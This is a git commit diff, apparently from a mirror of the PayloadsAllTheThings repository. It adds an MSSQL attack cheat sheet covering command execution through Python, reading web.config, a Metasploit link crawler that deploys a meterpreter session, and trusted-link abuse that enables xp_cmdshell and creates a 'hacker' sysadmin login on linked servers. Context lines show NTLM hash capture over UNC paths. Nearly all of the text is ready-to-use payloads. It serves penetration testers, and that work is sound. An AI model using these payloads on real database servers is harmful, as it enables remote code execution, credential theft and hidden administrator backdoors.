mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 01:15:25 +00:00
MSSQL Trusted Link
This commit is contained in:
parent
008cbcf9fc
commit
da5dc1299e
@ -17,6 +17,7 @@
|
|||||||
* [MSSQL Command execution](#mssql-command-execution)
|
* [MSSQL Command execution](#mssql-command-execution)
|
||||||
* [MSSQL UNC path](#mssql-unc-path)
|
* [MSSQL UNC path](#mssql-unc-path)
|
||||||
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
||||||
|
* [MSSQL Trusted Links](#mssql-trusted-links)
|
||||||
|
|
||||||
## MSSQL comments
|
## MSSQL comments
|
||||||
|
|
||||||
@ -25,6 +26,12 @@
|
|||||||
/* comment goes here */
|
/* comment goes here */
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## MSSQL User
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT CURRENT_USER
|
||||||
|
```
|
||||||
|
|
||||||
## MSSQL version
|
## MSSQL version
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
@ -162,6 +169,25 @@ sqsh -S 192.168.1.X -U sa -P superPassword
|
|||||||
python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758
|
python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Execute Python script
|
||||||
|
|
||||||
|
> Executed by a different user than the one using xp_cmdshell to execute commands
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
#Print the user being used (and execute commands)
|
||||||
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
|
||||||
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
|
||||||
|
#Open and read a file
|
||||||
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
|
||||||
|
#Multiline
|
||||||
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
|
||||||
|
import sys
|
||||||
|
print(sys.version)
|
||||||
|
'
|
||||||
|
GO
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## MSSQL UNC Path
|
## MSSQL UNC Path
|
||||||
|
|
||||||
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
|
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
|
||||||
@ -176,8 +202,41 @@ MSSQL supports stacked queries so we can create a variable pointing to our IP ad
|
|||||||
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## MSSQL Trusted Links
|
||||||
|
|
||||||
|
> The links between databases work even across forest trusts.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
msf> use exploit/windows/mssql/mssql_linkcrawler
|
||||||
|
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio
|
||||||
|
```
|
||||||
|
|
||||||
|
Manual exploitation
|
||||||
|
|
||||||
|
```sql
|
||||||
|
-- find link
|
||||||
|
select * from master..sysservers
|
||||||
|
|
||||||
|
-- execute query through the link
|
||||||
|
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
|
||||||
|
select version from openquery("linkedserver", 'select @@version as version');
|
||||||
|
|
||||||
|
-- chain multiple openquery
|
||||||
|
select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
|
||||||
|
|
||||||
|
-- execute shell commands
|
||||||
|
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
|
||||||
|
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
|
||||||
|
|
||||||
|
-- create user and give admin privileges
|
||||||
|
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||||
|
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||||
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
|
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
|
||||||
* [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
|
* [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
|
||||||
|
* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
|
||||||
|
* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
|
Loading…
Reference in New Issue
Block a user